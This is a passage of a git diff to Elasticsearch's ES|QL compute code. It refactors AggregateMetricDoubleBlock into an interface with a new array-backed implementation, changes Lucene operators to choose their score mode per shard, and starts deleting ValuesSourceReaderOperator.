(including absent null values) in the same order. This definition ensures that the + * equals method works properly across different implementations of the AggregateMetricDoubleBlock interface. + */ + static boolean equals(AggregateMetricDoubleBlock block1, AggregateMetricDoubleBlock block2) { + if (block1 == block2) { + return true; } - } - - @Override - public boolean isNull(int position) { - for (Block block : List.of(minBlock, maxBlock, sumBlock, countBlock)) { - if (block.isNull(position) == false) { - return false; - } - } - return true; - } - - @Override - public boolean mayHaveNulls() { - return Stream.of(minBlock, maxBlock, sumBlock, countBlock).anyMatch(Block::mayHaveNulls); - } - - @Override - public boolean areAllValuesNull() { - return Stream.of(minBlock, maxBlock, sumBlock, countBlock).allMatch(Block::areAllValuesNull); - } - - @Override - public boolean mayHaveMultivaluedFields() { - return Stream.of(minBlock, maxBlock, sumBlock, countBlock).anyMatch(Block::mayHaveMultivaluedFields); - } - - @Override - public boolean doesHaveMultivaluedFields() { - if (Stream.of(minBlock, maxBlock, sumBlock, countBlock).noneMatch(Block::mayHaveMultivaluedFields)) { + final int positions = block1.getPositionCount(); + if (positions != block2.getPositionCount()) { return false; } - return Stream.of(minBlock, maxBlock, sumBlock, countBlock).anyMatch(Block::doesHaveMultivaluedFields); - } - - @Override - public Block filter(int... positions) { - AggregateMetricDoubleBlock result = null; - DoubleBlock newMinBlock = null; - DoubleBlock newMaxBlock = null; - DoubleBlock newSumBlock = null; - IntBlock newCountBlock = null; - try { - newMinBlock = minBlock.filter(positions); - newMaxBlock = maxBlock.filter(positions); - newSumBlock = sumBlock.filter(positions); - newCountBlock = countBlock.filter(positions); - result = new AggregateMetricDoubleBlock(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); - return result; - } finally { - if (result == null) { - Releasables.close(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); - } - } - } - - @Override - public Block keepMask(BooleanVector mask) { - AggregateMetricDoubleBlock result = null; - DoubleBlock newMinBlock = null; - DoubleBlock newMaxBlock = null; - DoubleBlock newSumBlock = null; - IntBlock newCountBlock = null; - try { - newMinBlock = minBlock.keepMask(mask); - newMaxBlock = maxBlock.keepMask(mask); - newSumBlock = sumBlock.keepMask(mask); - newCountBlock = countBlock.keepMask(mask); - result = new AggregateMetricDoubleBlock(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); - return result; - } finally { - if (result == null) { - Releasables.close(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); + for (var doubleMetric : List.of( + AggregateMetricDoubleBlockBuilder.Metric.MIN, + AggregateMetricDoubleBlockBuilder.Metric.MAX, + AggregateMetricDoubleBlockBuilder.Metric.SUM + )) { + DoubleBlock doubleBlock1 = (DoubleBlock) block1.getMetricBlock(doubleMetric.getIndex()); + DoubleBlock doubleBlock2 = (DoubleBlock) block2.getMetricBlock(doubleMetric.getIndex()); + if (DoubleBlock.equals(doubleBlock1, doubleBlock2) == false) { + return false; } } - } - - @Override - public ReleasableIterator lookup(IntBlock positions, ByteSizeValue targetBlockSize) { - // TODO: support - throw new UnsupportedOperationException("can't lookup values from AggregateMetricDoubleBlock"); - } - - @Override - public MvOrdering mvOrdering() { - // TODO: determine based on sub-blocks - return MvOrdering.UNORDERED; - } - - @Override - public Block expand() { - // TODO: support - throw new UnsupportedOperationException("AggregateMetricDoubleBlock"); - } - - @Override - public void writeTo(StreamOutput out) throws IOException { - for (Block block : List.of(minBlock, maxBlock, sumBlock, countBlock)) { - block.writeTo(out); - } - } - - public static Block readFrom(StreamInput in) throws IOException { - boolean success = false; - DoubleBlock minBlock = null; - DoubleBlock maxBlock = null; - DoubleBlock sumBlock = null; - IntBlock countBlock = null; - BlockStreamInput blockStreamInput = (BlockStreamInput) in; - try { - minBlock = DoubleBlock.readFrom(blockStreamInput); - maxBlock = DoubleBlock.readFrom(blockStreamInput); - sumBlock = DoubleBlock.readFrom(blockStreamInput); - countBlock = IntBlock.readFrom(blockStreamInput); - AggregateMetricDoubleBlock result = new AggregateMetricDoubleBlock(minBlock, maxBlock, sumBlock, countBlock); - success = true; - return result; - } finally { - if (success == false) { - Releasables.close(minBlock, maxBlock, sumBlock, countBlock); + IntBlock intBlock1 = block1.countBlock(); + IntBlock intBlock2 = block2.countBlock(); + return IntBlock.equals(intBlock1, intBlock2); + } + + static int hash(AggregateMetricDoubleBlock block) { + final int positions = block.getPositionCount(); + int result = 1; + for (int pos = 0; pos < positions; pos++) { + if (block.isNull(pos)) { + result = 31 * result - 1; + } else { + final int valueCount = block.getValueCount(pos); + result = 31 * result + valueCount; + final int firstValueIdx = block.getFirstValueIndex(pos); + for (int valueIndex = 0; valueIndex < valueCount; valueIndex++) { + for (DoubleBlock b : List.of(block.minBlock(), block.maxBlock(), block.sumBlock())) { + result *= 31; + result += b.isNull(firstValueIdx + valueIndex) ? -1 : Double.hashCode(b.getDouble(firstValueIdx + valueIndex)); + } + result *= 31; + result += block.countBlock().isNull(firstValueIdx + valueIndex) + ? -1 + : block.countBlock().getInt(firstValueIdx + valueIndex); + } } } + return result; } - @Override - public long ramBytesUsed() { - return minBlock.ramBytesUsed() + maxBlock.ramBytesUsed() + sumBlock.ramBytesUsed() + countBlock.ramBytesUsed(); - } + DoubleBlock minBlock(); - @Override - public boolean equals(Object o) { - if (this == o) return true; - if (o == null || getClass() != o.getClass()) return false; - AggregateMetricDoubleBlock that = (AggregateMetricDoubleBlock) o; - return positionCount == that.positionCount - && minBlock.equals(that.minBlock) - && maxBlock.equals(that.maxBlock) - && sumBlock.equals(that.sumBlock) - && countBlock.equals(that.countBlock); - } + DoubleBlock maxBlock(); - @Override - public int hashCode() { - return Objects.hash( - DoubleBlock.hash(minBlock), - DoubleBlock.hash(maxBlock), - DoubleBlock.hash(sumBlock), - IntBlock.hash(countBlock), - positionCount - ); - } + DoubleBlock sumBlock(); - public DoubleBlock minBlock() { - return minBlock; - } + IntBlock countBlock(); - public DoubleBlock maxBlock() { - return maxBlock; - } - - public DoubleBlock sumBlock() { - return sumBlock; - } - - public IntBlock countBlock() { - return countBlock; - } - - public Block getMetricBlock(int index) { - if (index == AggregateMetricDoubleBlockBuilder.Metric.MIN.getIndex()) { - return minBlock; - } - if (index == AggregateMetricDoubleBlockBuilder.Metric.MAX.getIndex()) { - return maxBlock; - } - if (index == AggregateMetricDoubleBlockBuilder.Metric.SUM.getIndex()) { - return sumBlock; - } - if (index == AggregateMetricDoubleBlockBuilder.Metric.COUNT.getIndex()) { - return countBlock; - } - throw new UnsupportedOperationException("Received an index (" + index + ") outside of range for AggregateMetricDoubleBlock."); - } + Block getMetricBlock(int index); } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlockBuilder.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlockBuilder.java index 90e57d87fcd0c..3d1564d93af56 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlockBuilder.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlockBuilder.java @@ -59,7 +59,7 @@ protected int elementSize() { } @Override - public Block.Builder copyFrom(Block b, int beginInclusive, int endExclusive) { + public AggregateMetricDoubleBlockBuilder copyFrom(Block b, int beginInclusive, int endExclusive) { Block minBlock; Block maxBlock; Block sumBlock; @@ -84,7 +84,7 @@ public Block.Builder copyFrom(Block b, int beginInclusive, int endExclusive) { } @Override - public AbstractBlockBuilder appendNull() { + public AggregateMetricDoubleBlockBuilder appendNull() { minBuilder.appendNull(); maxBuilder.appendNull(); sumBuilder.appendNull(); @@ -93,7 +93,7 @@ public AbstractBlockBuilder appendNull() { } @Override - public Block.Builder mvOrdering(Block.MvOrdering mvOrdering) { + public AggregateMetricDoubleBlockBuilder mvOrdering(Block.MvOrdering mvOrdering) { minBuilder.mvOrdering(mvOrdering); maxBuilder.mvOrdering(mvOrdering); sumBuilder.mvOrdering(mvOrdering); @@ -102,7 +102,7 @@ public Block.Builder mvOrdering(Block.MvOrdering mvOrdering) { } @Override - public Block build() { + public AggregateMetricDoubleBlock build() { DoubleBlock minBlock = null; DoubleBlock maxBlock = null; DoubleBlock sumBlock = null; @@ -114,7 +114,7 @@ public Block build() { maxBlock = maxBuilder.build(); sumBlock = sumBuilder.build(); countBlock = countBuilder.build(); - AggregateMetricDoubleBlock block = new AggregateMetricDoubleBlock(minBlock, maxBlock, sumBlock, countBlock); + AggregateMetricDoubleBlock block = new AggregateMetricDoubleArrayBlock(minBlock, maxBlock, sumBlock, countBlock); success = true; return block; } finally { @@ -174,9 +174,9 @@ public String getLabel() { public record AggregateMetricDoubleLiteral(Double min, Double max, Double sum, Integer count) implements GenericNamedWriteable { public AggregateMetricDoubleLiteral { - min = min.isNaN() ? null : min; - max = max.isNaN() ? null : max; - sum = sum.isNaN() ? null : sum; + min = (min == null || min.isNaN()) ? null : min; + max = (max == null || max.isNaN()) ? null : max; + sum = (sum == null || sum.isNaN()) ? null : sum; } public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/Block.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/Block.java index bc8b31bc565df..c05d54d4e3c96 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/Block.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/Block.java @@ -345,7 +345,7 @@ static Block[] buildAll(Block.Builder... builders) { * This should be paired with {@link #readTypedBlock(BlockStreamInput)} */ static void writeTypedBlock(Block block, StreamOutput out) throws IOException { - if (false == supportsAggregateMetricDoubleBlock(out.getTransportVersion()) && block instanceof AggregateMetricDoubleBlock a) { + if (false == supportsAggregateMetricDoubleBlock(out.getTransportVersion()) && block instanceof AggregateMetricDoubleArrayBlock a) { block = a.asCompositeBlock(); } block.elementType().writeTo(out); @@ -360,7 +360,7 @@ static Block readTypedBlock(BlockStreamInput in) throws IOException { ElementType elementType = ElementType.readFrom(in); Block block = elementType.reader.readBlock(in); if (false == supportsAggregateMetricDoubleBlock(in.getTransportVersion()) && block instanceof CompositeBlock compositeBlock) { - block = AggregateMetricDoubleBlock.fromCompositeBlock(compositeBlock); + block = AggregateMetricDoubleArrayBlock.fromCompositeBlock(compositeBlock); } return block; } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/BlockFactory.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/BlockFactory.java index 55053f509591d..9e730004ab9f9 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/BlockFactory.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/BlockFactory.java @@ -436,7 +436,7 @@ public AggregateMetricDoubleBlockBuilder newAggregateMetricDoubleBlockBuilder(in return new AggregateMetricDoubleBlockBuilder(estimatedSize, this); } - public final Block newConstantAggregateMetricDoubleBlock( + public final AggregateMetricDoubleBlock newConstantAggregateMetricDoubleBlock( AggregateMetricDoubleBlockBuilder.AggregateMetricDoubleLiteral value, int positions ) { diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ConstantNullBlock.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ConstantNullBlock.java index 2ed905f4299ca..16242d6fb8050 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ConstantNullBlock.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ConstantNullBlock.java @@ -14,7 +14,6 @@ import org.elasticsearch.core.ReleasableIterator; import java.io.IOException; -import java.util.Objects; /** * Block implementation representing a constant null value. @@ -26,7 +25,8 @@ public final class ConstantNullBlock extends AbstractNonThreadSafeRefCounted LongBlock, FloatBlock, DoubleBlock, - BytesRefBlock { + BytesRefBlock, + AggregateMetricDoubleBlock { private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ConstantNullBlock.class); private final int positionCount; @@ -120,15 +120,53 @@ public long ramBytesUsed() { @Override public boolean equals(Object obj) { - if (obj instanceof ConstantNullBlock that) { - return this.getPositionCount() == that.getPositionCount(); + if (obj instanceof Block that) { + return this.getPositionCount() == 0 && that.getPositionCount() == 0 + || this.getPositionCount() == that.getPositionCount() && that.areAllValuesNull(); + } + if (obj instanceof Vector that) { + return this.getPositionCount() == 0 && that.getPositionCount() == 0; } return false; } @Override public int hashCode() { - return Objects.hash(getPositionCount()); + // The hashcode for ConstantNullBlock is calculated in this way so that + // we return the same hashcode for ConstantNullBlock as we would for block + // types that ConstantNullBlock implements that contain only null values. + // Example: a DoubleBlock with 8 positions that are all null will return + // the same hashcode as a ConstantNullBlock with a positionCount of 8. + int result = 1; + for (int pos = 0; pos < positionCount; pos++) { + result = 31 * result - 1; + } + return result; + } + + @Override + public DoubleBlock minBlock() { + return this; + } + + @Override + public DoubleBlock maxBlock() { + return this; + } + + @Override + public DoubleBlock sumBlock() { + return this; + } + + @Override + public IntBlock countBlock() { + return this; + } + + @Override + public Block getMetricBlock(int index) { + return this; } @Override diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/DocVector.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/DocVector.java index 20ca4ed70e3f8..ccd0f82343401 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/DocVector.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/DocVector.java @@ -138,7 +138,6 @@ private boolean checkIfSingleSegmentNonDecreasing() { prev = v; } return true; - } /** diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ElementType.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ElementType.java index 64fc0d2bdd263..e651a65cf69b2 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ElementType.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ElementType.java @@ -63,7 +63,7 @@ public enum ElementType { 10, "AggregateMetricDouble", BlockFactory::newAggregateMetricDoubleBlockBuilder, - AggregateMetricDoubleBlock::readFrom + AggregateMetricDoubleArrayBlock::readFrom ); private interface BuilderSupplier { diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneCountOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneCountOperator.java index 626f0b00f0e2c..cded3a3494738 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneCountOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneCountOperator.java @@ -58,7 +58,7 @@ public Factory( taskConcurrency, limit, false, - ScoreMode.COMPLETE_NO_SCORES + shardContext -> ScoreMode.COMPLETE_NO_SCORES ); this.shardRefCounters = contexts; } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMaxFactory.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMaxFactory.java index 82d766349ce9e..7e0003efaf669 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMaxFactory.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMaxFactory.java @@ -129,7 +129,7 @@ public LuceneMaxFactory( taskConcurrency, limit, false, - ScoreMode.COMPLETE_NO_SCORES + shardContext -> ScoreMode.COMPLETE_NO_SCORES ); this.contexts = contexts; this.fieldName = fieldName; diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMinFactory.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMinFactory.java index 505e5cd3f0d75..000ade1b19562 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMinFactory.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMinFactory.java @@ -130,7 +130,7 @@ public LuceneMinFactory( taskConcurrency, limit, false, - ScoreMode.COMPLETE_NO_SCORES + shardContext -> ScoreMode.COMPLETE_NO_SCORES ); this.shardRefCounters = contexts; this.fieldName = fieldName; diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneOperator.java index 366715530f665..f3eec4147f237 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneOperator.java @@ -112,11 +112,18 @@ protected Factory( int taskConcurrency, int limit, boolean needsScore, - ScoreMode scoreMode + Function scoreModeFunction ) { this.limit = limit; this.dataPartitioning = dataPartitioning; - this.sliceQueue = LuceneSliceQueue.create(contexts, queryFunction, dataPartitioning, autoStrategy, taskConcurrency, scoreMode); + this.sliceQueue = LuceneSliceQueue.create( + contexts, + queryFunction, + dataPartitioning, + autoStrategy, + taskConcurrency, + scoreModeFunction + ); this.taskConcurrency = Math.min(sliceQueue.totalSlices(), taskConcurrency); this.needsScore = needsScore; } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluator.java index 73eae67819907..0e2b020e2fb57 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluator.java @@ -10,6 +10,7 @@ import org.apache.lucene.search.Query; import org.apache.lucene.search.Scorable; import org.apache.lucene.search.ScoreMode; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.BooleanVector; @@ -29,6 +30,7 @@ public class LuceneQueryExpressionEvaluator extends LuceneQueryEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LuceneQueryExpressionEvaluator.class); LuceneQueryExpressionEvaluator(BlockFactory blockFactory, ShardConfig[] shards) { super(blockFactory, shards); @@ -64,6 +66,11 @@ protected void appendMatch(BooleanVector.Builder builder, Scorable scorer) throw builder.appendBoolean(true); } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED; + } + public record Factory(ShardConfig[] shardConfigs) implements EvalOperator.ExpressionEvaluator.Factory { @Override public EvalOperator.ExpressionEvaluator get(DriverContext context) { diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSliceQueue.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSliceQueue.java index ee9f217303195..1a0b349b45f3f 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSliceQueue.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSliceQueue.java @@ -112,12 +112,14 @@ public static LuceneSliceQueue create( DataPartitioning dataPartitioning, Function autoStrategy, int taskConcurrency, - ScoreMode scoreMode + Function scoreModeFunction ) { List slices = new ArrayList<>(); Map partitioningStrategies = new HashMap<>(contexts.size()); + for (ShardContext ctx : contexts) { for (QueryAndTags queryAndExtra : queryFunction.apply(ctx)) { + var scoreMode = scoreModeFunction.apply(ctx); Query query = queryAndExtra.query; query = scoreMode.needsScores() ? query : new ConstantScoreQuery(query); /* diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSourceOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSourceOperator.java index 9fedc595641b4..5201eede502df 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSourceOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSourceOperator.java @@ -81,7 +81,7 @@ public Factory( taskConcurrency, limit, needsScore, - needsScore ? COMPLETE : COMPLETE_NO_SCORES + shardContext -> needsScore ? COMPLETE : COMPLETE_NO_SCORES ); this.contexts = contexts; this.maxPageSize = maxPageSize; diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperator.java index d93a5493a3aba..553b4319f22e9 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperator.java @@ -12,14 +12,13 @@ import org.apache.lucene.search.CollectionTerminatedException; import org.apache.lucene.search.FieldDoc; import org.apache.lucene.search.LeafCollector; -import org.apache.lucene.search.Query; import org.apache.lucene.search.ScoreDoc; +import org.apache.lucene.search.ScoreMode; import org.apache.lucene.search.Sort; import org.apache.lucene.search.SortField; import org.apache.lucene.search.TopDocsCollector; import org.apache.lucene.search.TopFieldCollectorManager; import org.apache.lucene.search.TopScoreDocCollectorManager; -import org.apache.lucene.search.Weight; import org.elasticsearch.common.Strings; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.DocBlock; @@ -44,9 +43,6 @@ import java.util.function.Function; import java.util.stream.Collectors; -import static org.apache.lucene.search.ScoreMode.TOP_DOCS; -import static org.apache.lucene.search.ScoreMode.TOP_DOCS_WITH_SCORES; - /** * Source operator that builds Pages out of the output of a TopFieldCollector (aka TopN) */ @@ -75,7 +71,7 @@ public Factory( taskConcurrency, limit, needsScore, - needsScore ? TOP_DOCS_WITH_SCORES : TOP_DOCS + scoreModeFunction(sorts, needsScore) ); this.contexts = contexts; this.maxPageSize = maxPageSize; @@ -331,18 +327,11 @@ static final class ScoringPerShardCollector extends PerShardCollector { } } - private static Function weightFunction( - Function queryFunction, - List> sorts, - boolean needsScore - ) { + private static Function scoreModeFunction(List> sorts, boolean needsScore) { return ctx -> { - final var query = queryFunction.apply(ctx); - final var searcher = ctx.searcher(); try { // we create a collector with a limit of 1 to determine the appropriate score mode to use. - var scoreMode = newPerShardCollector(ctx, sorts, needsScore, 1).collector.scoreMode(); - return searcher.createWeight(searcher.rewrite(query), scoreMode, 1); + return newPerShardCollector(ctx, sorts, needsScore, 1).collector.scoreMode(); } catch (IOException e) { throw new UncheckedIOException(e); } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorFactory.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorFactory.java index 97286761b7bcf..bb1d889db3f85 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorFactory.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorFactory.java @@ -45,7 +45,7 @@ private TimeSeriesSourceOperatorFactory( taskConcurrency, limit, false, - ScoreMode.COMPLETE_NO_SCORES + shardContext -> ScoreMode.COMPLETE_NO_SCORES ); this.contexts = contexts; this.maxPageSize = maxPageSize; diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperator.java deleted file mode 100644 index 500bef6d2a597..0000000000000 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperator.java +++ /dev/null @@ -1,792 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -package org.elasticsearch.compute.lucene; - -import org.apache.lucene.index.IndexReader; -import org.apache.lucene.index.LeafReaderContext; -import org.apache.lucene.index.SortedDocValues; -import org.apache.lucene.util.BytesRef; -import org.elasticsearch.TransportVersion; -import org.elasticsearch.common.Strings; -import org.elasticsearch.common.io.stream.NamedWriteableRegistry; -import org.elasticsearch.common.io.stream.StreamInput; -import org.elasticsearch.common.io.stream.StreamOutput; -import org.elasticsearch.compute.data.Block; -import org.elasticsearch.compute.data.BlockFactory; -import org.elasticsearch.compute.data.BytesRefBlock; -import org.elasticsearch.compute.data.DocBlock; -import org.elasticsearch.compute.data.DocVector; -import org.elasticsearch.compute.data.ElementType; -import org.elasticsearch.compute.data.IntVector; -import org.elasticsearch.compute.data.Page; -import org.elasticsearch.compute.data.SingletonOrdinalsBuilder; -import org.elasticsearch.compute.operator.AbstractPageMappingOperator; -import org.elasticsearch.compute.operator.DriverContext; -import org.elasticsearch.compute.operator.Operator; -import org.elasticsearch.core.Releasable; -import org.elasticsearch.core.Releasables; -import org.elasticsearch.index.fieldvisitor.StoredFieldLoader; -import org.elasticsearch.index.mapper.BlockLoader; -import org.elasticsearch.index.mapper.BlockLoaderStoredFieldsFromLeafLoader; -import org.elasticsearch.index.mapper.SourceLoader; -import org.elasticsearch.search.fetch.StoredFieldsSpec; -import org.elasticsearch.xcontent.XContentBuilder; - -import java.io.IOException; -import java.io.UncheckedIOException; -import java.util.ArrayList; -import java.util.List; -import java.util.Map; -import java.util.Objects; -import java.util.TreeMap; -import java.util.function.IntFunction; -import java.util.function.Supplier; - -import static org.elasticsearch.TransportVersions.ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED; -import static org.elasticsearch.TransportVersions.ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED_8_19; - -/** - * Operator that extracts doc_values from a Lucene index out of pages that have been produced by {@link LuceneSourceOperator} - * and outputs them to a new column. - */ -public class ValuesSourceReaderOperator extends AbstractPageMappingOperator { - /** - * Minimum number of documents for which it is more efficient to use a - * sequential stored field reader when reading stored fields. - *

- * The sequential stored field reader decompresses a whole block of docs - * at a time so for very short lists it won't be faster to use it. We use - * {@code 10} documents as the boundary for "very short" because it's what - * search does, not because we've done extensive testing on the number. - *

- */ - static final int SEQUENTIAL_BOUNDARY = 10; - - /** - * Creates a factory for {@link ValuesSourceReaderOperator}. - * @param fields fields to load - * @param shardContexts per-shard loading information - * @param docChannel the channel containing the shard, leaf/segment and doc id - */ - public record Factory(List fields, List shardContexts, int docChannel) implements OperatorFactory { - @Override - public Operator get(DriverContext driverContext) { - return new ValuesSourceReaderOperator(driverContext.blockFactory(), fields, shardContexts, docChannel); - } - - @Override - public String describe() { - StringBuilder sb = new StringBuilder(); - sb.append("ValuesSourceReaderOperator[fields = ["); - if (fields.size() < 10) { - boolean first = true; - for (FieldInfo f : fields) { - if (first) { - first = false; - } else { - sb.append(", "); - } - sb.append(f.name); - } - } else { - sb.append(fields.size()).append(" fields"); - } - return sb.append("]]").toString(); - } - } - - /** - * Configuration for a field to load. - * - * {@code blockLoader} maps shard index to the {@link BlockLoader}s - * which load the actual blocks. - */ - public record FieldInfo(String name, ElementType type, IntFunction blockLoader) {} - - public record ShardContext(IndexReader reader, Supplier newSourceLoader, double storedFieldsSequentialProportion) {} - - private final FieldWork[] fields; - private final List shardContexts; - private final int docChannel; - private final BlockFactory blockFactory; - - private final Map readersBuilt = new TreeMap<>(); - private long valuesLoaded; - - int lastShard = -1; - int lastSegment = -1; - - /** - * Creates a new extractor - * @param fields fields to load - * @param docChannel the channel containing the shard, leaf/segment and doc id - */ - public ValuesSourceReaderOperator(BlockFactory blockFactory, List fields, List shardContexts, int docChannel) { - this.fields = fields.stream().map(f -> new FieldWork(f)).toArray(FieldWork[]::new); - this.shardContexts = shardContexts; - this.docChannel = docChannel; - this.blockFactory = blockFactory; - } - - @Override - protected Page process(Page page) { - DocVector docVector = page.getBlock(docChannel).asVector(); - - Block[] blocks = new Block[fields.length]; - boolean success = false; - try { - if (docVector.singleSegmentNonDecreasing()) { - IntVector docs = docVector.docs(); - int shard = docVector.shards().getInt(0); - int segment = docVector.segments().getInt(0); - loadFromSingleLeaf(blocks, shard, segment, new BlockLoader.Docs() { - @Override - public int count() { - return docs.getPositionCount(); - } - - @Override - public int get(int i) { - return docs.getInt(i); - } - }); - } else if (docVector.singleSegment()) { - loadFromSingleLeafUnsorted(blocks, docVector); - } else { - try (LoadFromMany many = new LoadFromMany(blocks, docVector)) { - many.run(); - } - } - success = true; - for (Block b : blocks) { - valuesLoaded += b.getTotalValueCount(); - } - return page.appendBlocks(blocks); - } catch (IOException e) { - throw new UncheckedIOException(e); - } finally { - if (success == false) { - Releasables.closeExpectNoException(blocks); - } - } - } - - private void positionFieldWork(int shard, int segment, int firstDoc) { - if (lastShard == shard) { - if (lastSegment == segment) { - for (FieldWork w : fields) { - w.sameSegment(firstDoc); - } - return; - } - lastSegment = segment; - for (FieldWork w : fields) { - w.sameShardNewSegment(); - } - return; - } - lastShard = shard; - lastSegment = segment; - for (FieldWork w : fields) { - w.newShard(shard); - } - } - - private boolean positionFieldWorkDocGuarteedAscending(int shard, int segment) { - if (lastShard == shard) { - if (lastSegment == segment) { - return false; - } - lastSegment = segment; - for (FieldWork w : fields) { - w.sameShardNewSegment(); - } - return true; - } - lastShard = shard; - lastSegment = segment; - for (FieldWork w : fields) { - w.newShard(shard); - } - return true; - } - - private void loadFromSingleLeaf(Block[] blocks, int shard, int segment, 